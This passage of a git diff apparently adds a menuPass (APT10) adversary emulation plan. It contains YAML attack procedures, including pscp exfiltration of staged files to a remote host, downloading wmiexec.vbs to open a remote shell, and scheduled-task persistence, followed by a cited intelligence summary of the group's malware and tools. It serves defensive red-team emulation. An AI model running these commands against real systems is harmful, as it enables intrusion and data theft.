+      type: String
+      default: |
+        aa.rar
+
+  executors:
+  - name: command_prompt
+    command: |
+      copy #{copy_filename} "C:\$Recycle.Bin\"
+
+# Scenario 1, Step 7: Exfiltration
+
+- id: ea4bc858-ba13-4f97-9df3-c543d8f3d44c
+  name: Transfer Data to Cloud Account
+  description: Exfil data to cloud account
+  tactic: exfiltration
+  technique:
+    attack_id: T1537
+    name: "Transfer Data to Cloud Account"
+  cti_source: https://pwc.co.uk/cyber-secrity/pdf/cloud-hopper-report-final-v4.pdf
+  procedure_group: procedure_exfiltration
+  procedure_step: "7.A"
+  platforms:
+    windows:
+      cmd:
+        command: |
+          "#{pscp_local_path}\pscp.exe" "#{pscp_exfil_files}" "#{pscp_user}"@"#{pscp_server}":/"#{pscp_drop_location}"
+        payloads:
+        - pscp.exe
+
+  input_arguments:
+    pscp_url:
+      description: Path to download pscp.exe
+      type: URL
+      default: https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe
+
+    pscp_local_path:
+      description: Local path to pscp.exe
+      type: Path
+      default: |
+        C:\Windows\Temp
+
+    pscp_exfil_files:
+      description: Path of files to be sent with pscp
+      type: Path
+      default: |
+        C:\Windows\Temp\exfil
+
+    pscp_user:
+      description: Remote username
+      type: String
+      default: |
+        Administrator
+
+    pscp_server:
+      description: IP or hostname of remote host to connect via pscp
+      type: String
+      default: |
+        192.0.2.10
+
+    pscp_drop_location:
+      description: Path where to download pscp.exe
+      type: Path
+      default: |
+        temp
+
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      pscp.exe must exist on disk at specified location "#{pscp_local_path}"
+    prereq_command: |
+      if (Test-Path "#{pscp_local_path}\pscp.exe") {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "#{pscp_url}" -OutFile "#{pscp_local_path}\pscp.exe"
+
+  executors:
+  - name: command_prompt
+    command: |
+      "#{pscp_local_path}\pscp.exe" "#{pscp_exfil_files}" "#{pscp_user}"@"#{pscp_server}":/"#{pscp_drop_location}"
+
+
+# Scenario 1, Step 8 - Execution
+
+- id: 8911d502-747a-4155-adcd-b03a1f284ee7
+  name: Windows Management Instrumentation
+  description: Using wmiexec.vbs to execute tactical malware
+  tactic: execution
+  technique:
+    attack_id: T1047
+    name: "Windows Management Instrumentation"
+  cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+  procedure_group: procedure_execution
+  procedure_step: "8.A"
+  platforms:
+    windows:
+      cmd:
+        command: |
+          cscript.exe "#{wmiexec_local_path}\wmiexec.vbs" /shell "#{wmiexec_remote_host}"
+        payloads:
+        - wmiexec.vbs
+
+  input_arguments:
+    wmiexec_local_path:
+      description: Path of wmiexec.vbs
+      type: Path
+      default: |
+        C:\Windows\Temp
+
+    wmiexec_url:
+      description: Path to download wmiexec.vbs
+      type: URL
+      default: |
+        https://raw.githubusercontent.com/Twi1ight/AD-Pentest-Script/master/wmiexec.vbs
+
+    wmiexec_remote_host:
+      description: Hostname or IP of remote host
+      type: String
+      default: |
+        192.0.2.10
+
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      wmiexec.vbs must be located at "#{wmiexec_local_path}"
+    prereq_command: |
+      if (Test-Path "#{wmiexec_local_path}\wmiexec.vbs") {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "#{wmiexec_url}" -OutFile "#{wmiexec_local_path}\wmiexec.vbs"
+
+  executors:
+  - name: command_prompt
+    command: |
+      cscript.exe "#{wmiexec_local_path}\wmiexec.vbs" /shell "#{wmiexec_remote_host}"
+
+
+# Scenario 1, Step 9: Persistence
+
+- id: 236d1357-64f9-4a98-afc1-bccaa89aba8c
+  name: Scheduled Task Persistence
+  description: menuPass is reported to have used scheduled tasks to persist
+  tactic: persistence
+  technique:
+    attack_id: T1553.005
+    name: "Scheduled Task/Job: Scheduled Task"
+  cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+  procedure_group: procedure_persistence
+  procedure_step: "7.1"
+  platforms:
+    windows:
+      cmd:
+        command: |
+          schtasks /create /sc "#{schtask_schedule}" /tn "#{schtask_taskname}" /tr "#{schtask_taskrun}" /ru "#{schtask_username}"
+
+  input_arguments:
+    schtask_schedule:
+      description: Value that specifies the schedule frequency. (MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONLOGON, ONIDLE, and ONEVENT)
+      type: String
+      default: |
+        DAILY
+
+    schtask_taskname:
+      description: A value that specifies a name which uniquely identifies the scheduled task.
+      type: String
+      default: |
+        taskname
+
+    schtask_taskrun:
+      description: A value that specifies the path and file name of the task to be run at the scheduled time.
+      type: Path
+      default: |
+        C:\Windows\Temp
+
+    schtask_username:
+      description: A value that specifies the user context under which the task runs.
+      type: String
+      default: |
+        username
+
+  executors:
+  - name: command_prompt
+    elevation_required: true
+    command: |
+      schtasks /create /sc "#{schtask_schedule}" /tn "#{schtask_taskname}" /tr "#{schtask_taskrun}" /ru "#{schtask_username}"
diff --git a/menuPass/Intelligence_Summary.md b/menuPass/Intelligence_Summary.md
new file mode 100644
index 00000000..20c87264
--- /dev/null
+++ b/menuPass/Intelligence_Summary.md
@@ -0,0 +1,183 @@
+# menuPass Intelligence Summary
+
+## ATT&CK Group ID: [G0045](https://attack.mitre.org/groups/G0045/)
+
+## Associated Groups: [Stone Panda](https://crowdstrike.com/blog/two-birds-one-stone-panda/), [APT10](https://fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html), [Red Apollo](https://justice.gov/opa/press-release/file/1121706/download), [CVNX](https://fbi.gov/wanted/cyber/zhu-hua), [HOGFISH](https://www.accenture.com/t20180423T055005Z_s_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf), [BRONZE RIVERSIDE](https://secureworks.com/research/threat-profiles/bronze-riverside)
+
+**Objectives:** menuPass is thought to be motivated by collection objectives that align with Chinese national interests.  Their operational objective over time and across a diverse target set appears to be intellectual property theft.  A 2018 indictment issued by the United States Department of Justice suggests at least a portion of the activity attributed to menuPass was carried out by two employees of Huaying Haitai Science and Technology Development Company.  These individuals are believed to have been working at the behest of the Chinese Ministry of State Security’s (MSS) Tianjin State Security Bureau.<sup>[6](https://justice.gov/opa/press-release/file/1121706/download)</sup> <sup>[14](https://crowdstrike.com/blog/two-birds-one-stone-panda/)</sup> <sup>[17](https://intrusiontruth.wordpress.com/2018/08/15/apt10-was-managed-by-the-tianjin-bureau-of-the-chinese-ministry-of-state-security/)</sup> menuPass is reported to have been active since at least 2009 but may have been operating as early as 2006.<sup>[6](https://justice.gov/opa/press-release/file/1121706/download)</sup>
+
+**Target Industries:** The indicted menuPass actors were charged with one count each of conspiracy to commit computer intrusions.  The document discloses two campaigns attributed to these actors.  The first campaign is reported to have begun in 2006, and is thought to have been motivated by technology theft.  These efforts were directed against NASA's Jet Propulsion Laboratory (JPL) and organizations in aviation, space, communications, manufacturing, maritime, oil and gas.<sup>[6](https://justice.gov/opa/press-release/file/1121706/download)</sup>
+
+The second campaign, is thought to have begun in 2014 and initially targeted Managed Service Providers (MSPs).  The group targeted MSPs for the purpose of pivoting into MSP customer networks.  This campaign resulted in the compromise of organizations in banking and finance, telecommunications, medical equipment, manufacturing, consulting, healthcare, biotechnology, automotive, oil, gas exploration, and mining.<sup>[6](https://justice.gov/opa/press-release/file/1121706/download)</sup>
+
+In addition to the two campaigns listed in the 2018 indictment, menuPass actors are reported to have targeted public and private sector entities in at least 12 other countries.  Aside from targeting organizations based in the United States, the group is perhaps best known for its extensive and sustained efforts against Japanese institutions.  menuPass actors are reported to have targeted public and private interests alike, to include public policy organizations, educational institutions, media, and technology firms.<sup>[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup>
+
+Researchers have suggested menuPass targeting may broadly align with China’s strategic objectives as stated in the Five-Year Plan (FYP) / Made in China 2025 Plan.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> menuPass is thought to have pursued these objectives over disparate but concurrent campaigns.  From 2016 – 2018, menuPass actors are thought to have been engaged in operations directed against various MSPs, Japanese institutions, manufacturing companies in India and Europe, a mining company in South America, a U.S. based law firm, an international apparel company, and several other targets in Europe, the Middle East, and Africa.<sup>[1](https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/)</sup> <sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup> <sup>[6](https://www.justice.gov/opa/press-release/file/1121706/download)</sup> <sup>[8](https://www.accenture.com/t20180423T055005Z_s_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf)</sup> <sup>[9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)</sup> <sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup> <sup>[11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/)</sup> <sup>[12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A)</sup> <sup>[13](https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor)</sup>
+
+**Operations:** menuPass actors are reported to have pursued initial access by spearphishing to achieve user execution ([T1204.002](https://attack.mitre.org/techniques/T1204/002/)).<sup>[1](https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/)</sup> <sup>[6](https://www.justice.gov/opa/press-release/file/1121706/download)</sup> <sup>[8](https://www.accenture.com/t20180423T055005Z_s_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf)</sup> <sup>[9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)</sup> <sup>[11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/)</sup> <sup>[15](http://blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/)</sup> <sup>[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup> <sup>[20](https://lac.co.jp/lacwatch/people/20170223_001224.html)</sup> <sup>[21](https://lac.co.jp/lacwatch/people/20180521_001638.html)</sup>  menuPass spearphishing attempts generally assume a pretext that would be of interest to the intended target and are reported to have featured password protected Microsoft Word documents embedded with VBA macros ([T1566.001](https://attack.mitre.org/techniques/T1566/001/)), an executable attachment that exploits a vulnerability ([T1566.001](https://attack.mitre.org/techniques/T1566/001/)), or a link that points to a payload server ([T1566.002](https://attack.mitre.org/techniques/T1566/002/)).<sup>[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup>  Once inside the target organization, menuPass actors have used a variety of open-source, modified open-source, and custom tools to perform discovery, escalate privileges, access credentials, move laterally, and exfiltrate data.
+
+"Operation Cloud Hopper," was a long-term persistent effort to compromise MSPs with the intent of abusing trust relationships in order to pivot into customer networks.([T1199](https://attack.mitre.org/techniques/T1199/)).<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup> <sup>[6](https://www.justice.gov/opa/press-release/file/1121706/download)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> <sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup> <sup>[12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A)</sup>  menuPass actors are thought to have achieved initial access to MSP networks by spearphishing.  From the MSP networks, menuPass actors are reported to have used legitimate but compromised local accounts ([T1078.003](https://attack.mitre.org/techniques/T1078/003/)) coupled with legitimate remote access applications ([T1133](https://attack.mitre.org/techniques/T1133/)) to access customer environments.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup> <sup>[6](https://www.justice.gov/opa/press-release/file/1121706/download)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> <sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup> <sup>[12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A)</sup>  From this initial point of presence, menuPass actors are reported to have used administrative tools native to the Windows environment to download an operational toolkit from an attacker controlled server.  This toolkit enabled the pursuit of tactical objectives with the operational intent of exfiltrating intellectual property.  This activity will serve as the basis for Scenario 1.
+
+menuPass is also reported to have engaged in phishing campaigns, the most prolific of which were directed against Japanese institutions.  Successful compromise resulted in the deployment of menuPass malware to the victim network and the establishment of command and control.  menuPass malware has been categorized by the manner in which it was employed by menuPass actors and not necessarily by the malware's inherent functionality.  PWC categorized menuPass malware as tactical or sustained.<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>  Tactical malware is usually deployed during delivery, or upon initial access, and is intended to perform lightweight tasks, such as discovery and execution.<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>  Sustained malware is often modular and has an enhanced set of features.<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>  Sustained malware is deployed to specific systems to facilitate a long-term point of presence.<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>  menuPass is reported to have leveraged the access facilitated by its malware to pursue operational objectives.  This activity will serve as the basis for Scenario 2.
+
+## Tactical Malware
+
+Name | Associated Names | Availability | Emulation Notes|
+|:---:|:---|:---|:---|
+[ChChes](https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/) ([S0144](https://attack.mitre.org/software/S0144/))| [HAYMAKER](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html), [Scorpian](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|Custom| Has been injected using PowerSploit<sup>[29](https://blogs.jpcert.or.jp/en/2017/03/malware-leveraging-powersploit.html)</sup>|
+[EvilGrab](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) ([S0152](https://attack.mitre.org/software/S0152/))| Vidgrab, Grabber| Custom|Used to "grab" audio, video, and screenshots.  Also capable of lightweight reconnaissance tasks<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>|
+[Koadic](https://www.trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html) ([S0250](https://attack.mitre.org/software/S0250/))| |Publicly available | Delivered via phishing and used to download and execute ANEL<sup>[16](https://www.trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup>|
+[RedLeaves](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) ([S0153](https://attack.mitre.org/software/S0153/))| [BUGJUICE](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html), [Trochilus](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf)| Custom| Operates like publicly available Trochilus<sup>[11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/)</sup>| Has been deployed to DC to copy NTDS.DIT<sup>[10](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf)</sup>
+[SNUGRIDE](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) ([S0159](https://attack.mitre.org/software/S0159/))| |Custom|Capable of lightweight tasks and persistence.  Communicates over HTTP requests<sup>[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup>|
+[UPPERCUT](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf) ([S0275](https://attack.mitre.org/software/S0275/))|[ANEL](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf) |Custom| Often deployed via phishing<sup>[9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)</sup>|
+
+---
+## Sustained Malware
+Name | Associated Names| Availability | Emulation Notes|
+|:---:|:---|:---|:---|
+[Poison Ivy](https://fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf) ([S0012](https://attack.mitre.org/software/S0012/))|Darkmoon|Custom|menuPass is reported to have deployed Poison Ivy as early as 2009 and as recently as 2014<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>|
+[PlugX](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/) ([S0013](https://attack.mitre.org/software/S0013/))| [SOGU](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) |Custom|Typically deployed as a self-exttracting archive<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>|
+[QuasarRAT](https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor) ([S0262](https://attack.mitre.org/software/S0262/))|CinaRAT, Yggdrasil|Publicly available|A publicly available RAT typically deployed with a custom .NET loader<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>|
+---
+
+menuPass actors have demonstrated a responsiveness to public reporting and an adaptability born of operational necessity.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>  The group has also displayed an aptitude for defense evasion using techniques like DLL load order hijacking ([T1574.001](https://attack.mitre.org/techniques/T1574/001/)) and DLL side-loading ([T1574.002](https://attack.mitre.org/techniques/T1574/002/)) to achieve execution and bypass application whitelisting.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> <sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup> <sup>[11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/)</sup> <sup>[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup> <sup>[18](https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html)</sup> <sup>[19](https://carbonblack.com/blog/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-sideloading/)</sup>  When possible, menuPass actors have situated their malware in memory, used code-signing certificates ([T1553.002](https://attack.mitre.org/techniques/T1553/002/)), masqueraded files dropped to disk ([T1036.005](https://attack.mitre.org/techniques/T1036/005/)) and used encryption to evade host ([T1027.002](https://attack.mitre.org/techniques/T1027/002/)) and network-based defenses.
+
+menuPass actors have persisted sustained malware by modifying the registry ([T1547.001](https://attack.mitre.org/techniques/T1547/001/)), scheduling tasks ([T1053.005](https://attack.mitre.org/techniques/T1053/005/)) and creating Windows services ([T1543.003](https://attack.mitre.org/techniques/T1543/003/)).<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> <sup>[8](https://www.accenture.com/t20180423T055005Z_s_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf)</sup> The group is reported to have used legitimate but compromised credentials from MSP environments to impersonate elevated users in customer networks ([T1078.003](https://attack.mitre.org/techniques/T1078/003/)) and harvest additional credentials ([T1003.001](https://attack.mitre.org/techniques/T1003/001/), [T1003.002](https://attack.mitre.org/techniques/T1003/002/), [T1003.003](https://attack.mitre.org/techniques/T1003/003/)) using open-source tools like Mimikatz and Secretsdump.  This credential access enables persistent presence within the environment as menuPass actors are reported to have used the compromised credentials ([T1078.002](https://attack.mitre.org/techniques/T1078/002/), [T1078.003](https://attack.mitre.org/techniques/T1078/003/)) coupled with legitimate remote access tools like TeamViewer, to access target environments at will.<sup>[12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A)</sup>  Additionally, menuPass has deployed versions of the China Chopper web shell to internet accessible webservers to facilitate persistent access ([T1505.003](https://attack.mitre.org/techniques/T1505/003/)).
+
+Once in the target environment, menuPass actors perform discovery to identify opportunities, while attempting to blend in, so as to minimize operational risk.  The group has used tools indicative of routine administrative functions to move laterally.  Systems of interest were accessed over RDP ([T1021.001](https://attack.mitre.org/techniques/T1021/001/)), by mounting network shares ([T1570](https://attack.mitre.org/techniques/T1570/), [T1021.002](https://attack.mitre.org/techniques/T1021/002/)), or by using PsExec ([S0029](https://attack.mitre.org/software/S0029/))([T1021.002](https://attack.mitre.org/techniques/T1021/002/), [T1569.002](https://attack.mitre.org/techniques/T1569/002/)).  menuPass is reputed to have exfiltrated large volumes of data from its victims.  After achieving enabling objectives, the group moved laterally to systems of interest in search of sensitive information.  This data was staged ([T1074.001](https://attack.mitre.org/techniques/T1074/001/)) in multi-part archives ([T1560.001](https://attack.mitre.org/techniques/T1560/001/)) in the Recycle Bin for exfiltration.  These archives were exfiltrated from the target environment using tools like Putty Secure Copy Client (PSCP) and Robocopy.
+
+---
+
+## menuPass Software
+
+Name | menuPass Name | Emulation Notes|
+|:---:|:---|:---|
+BITSAdmin ([S0190](https://attack.mitre.org/software/S0190/))| |Transfer tools from C2 to C:\ProgramData\temp or C:\ProgramData\media<sup>[10](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf)</sup>|
+certutil ([S0160](https://attack.mitre.org/software/S0160/))| |Used to download and decode b64 encoded files<sup>[9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)</sup>|
+China Chopper ([S0020](https://attack.mitre.org/software/S0020/)) |iisstart.aspx|A China Chopper variant may have been deployed to a web server to maintain persistence<sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup>|
+Csvde| |Used to export data from active directory<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>|
+cURL| c.exe, CU.exe|Used to exfiltrate data from a network<sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup>|
+esentutl ([S0404](https://attack.mitre.org/software/S0404/))| |Used to copy and delete files<sup>[9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)</sup>|
+Impacket ([S0357](https://attack.mitre.org/software/S0357/))| |Atexec, psexec, and secretsdump are compiled using PyInstaller and employed during enabling objectives<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>
+Koadic ([S0250](https://attack.mitre.org/software/S0250/))| |Delivered via spearphishing, has been used to download and execute ANEL<sup>[16](https://www.trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup>|
+Mimikatz ([S0002](https://attack.mitre.org/software/S0002/))| Pd.exe, MSVCR100.dll|Repacked and/or compiled to DLL version executed via load order hijacking or sideloading<sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup>
+Nbtscan | Nbt.exe |Used to enumerate NetBIOS sessions<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>|
+NetSess | |Observed enumerating NetBIOS sessions during reconnaissance<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>|
+PowerSploit ([S0194](https://attack.mitre.org/software/S0194/))| |Discovery, lateral movement, and injected ChChes into PowerShell process<sup>[29](https://blogs.jpcert.or.jp/en/2017/03/malware-leveraging-powersploit.html)</sup>
+PsExec ([S0029](https://attack.mitre.org/software/S0029/))| Psexe.exe |Used to execute tools on a remote host<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>|
+pwdump ([S0006](https://attack.mitre.org/software/S0006/))| Consl64.exe|DLL containing repacked PwDump6<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>
+Putty (PSCP)|Rundll32.exe |Used to exfiltrate data from a network<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>|
+Tcping| Rund1132.exe|One of two files included in detect.vbs used to probe ports 445 and 3389<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>|
+Wmiexec| t.vbs|Dropped to C:\Recovery, C:\Intel, or C:\PerLogs<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>|
+WinRAR| Svchost.exe, r.exe|Compressed files for exfil, named using repeating charaters e.g. ss.rar, pp.rar, dds.rar, gggg.rar<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>|
+
+---
+
+## menuPass ATT&CK Navigator
+
+#### The following behaviors are in scope for an emulation of actions attributed to menuPass in the [referenced reporting](#references).
+
+[![/menuPass/Attack_Layers/menuPass_G0045.png](/menuPass/Attack_Layers/menuPass_G0045.png)](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fgroups%2FG0045%2FG0045-enterprise-layer.json)
+
+
+## [ChChes (S0144)](https://attack.mitre.org/software/S0144/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using ChChes, exclusively based on current intelligence within ATT&CK for the given software.
+
+[![/menuPass/Attack_Layers/ChChes_S0144.png](/menuPass/Attack_Layers/ChChes_S0144.png)](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0144%2FS0144-enterprise-layer.json)
+
+## [Cobalt Strike (S0154)](https://attack.mitre.org/software/S0154/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using Cobalt Strike, exclusively based on current intelligence within ATT&CK for the given software.
+
+[![/menuPass/Attack_Layers/Cobalt_Strike_S0154.png](/menuPass/Attack_Layers/Cobalt_Strike_S0154.png)](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0154%2FS0154-enterprise-layer.json)
+
+## [EvilGrab (S0152)](https://attack.mitre.org/software/S0152/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using EvilGrab, exclusively based on current intelligence within ATT&CK for the given software.
+
+[![/menuPass/Attack_Layers/EvilGrab_S0152.png](/menuPass/Attack_Layers/EvilGrab_S0152.png)](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0152%2FS0152-enterprise-layer.json)
+
+## [Koadic (S0250)](https://attack.mitre.org/software/S0250/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using Koadic, exclusively based on current intelligence within ATT&CK for the given software.
+
+[![/menuPass/Attack_Layers/Koadic_S0250.png](/menuPass/Attack_Layers/Koadic_S0250.png)](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0250%2FS0250-enterprise-layer.json)
+
+## [PlugX (S0013)](https://attack.mitre.org/software/S0013/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using PlugX, exclusively based on current intelligence within ATT&CK for the given software.
+
+[![/menuPass/Attack_Layers/PlugX_S0013.png](/menuPass/Attack_Layers/PlugX_S0013.png)](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0013%2FS0013-enterprise-layer.json)
+
+## [PoisonIvy (S0012)](https://attack.mitre.org/software/S0012/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using PoisonIvy, exclusively based on current intelligence within ATT&CK for the given software.
+
+[![/menuPass/Attack_Layers/PoisonIvy_S0012.png](/menuPass/Attack_Layers/PoisonIvy_S0012.png)](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0012%2FS0012-enterprise-layer.json)
+
+## [QuasarRAT (S0262)](https://attack.mitre.org/software/S0262/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using QuasarRAT, exclusively based on current intelligence within ATT&CK for the given software.
+
+[![/menuPass/Attack_Layers/QuasarRAT_S0262.png](/menuPass/Attack_Layers/QuasarRAT_S0262.png)](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0262%2FS0262-enterprise-layer.json)
+
+## [RedLeaves (S0153)](https://attack.mitre.org/software/S0153/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using RedLeaves, exclusively based on current intelligence within ATT&CK for the given software.
+
+[![/menuPass/Attack_Layers/RedLeaves_S0153.png](/menuPass/Attack_Layers/RedLeaves_S0153.png)](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0153%2FS0153-enterprise-layer.json)
+
+---
+
+## References
+
+ID | Source | Publisher | Date |
+|:---:|:---|:---|:---|
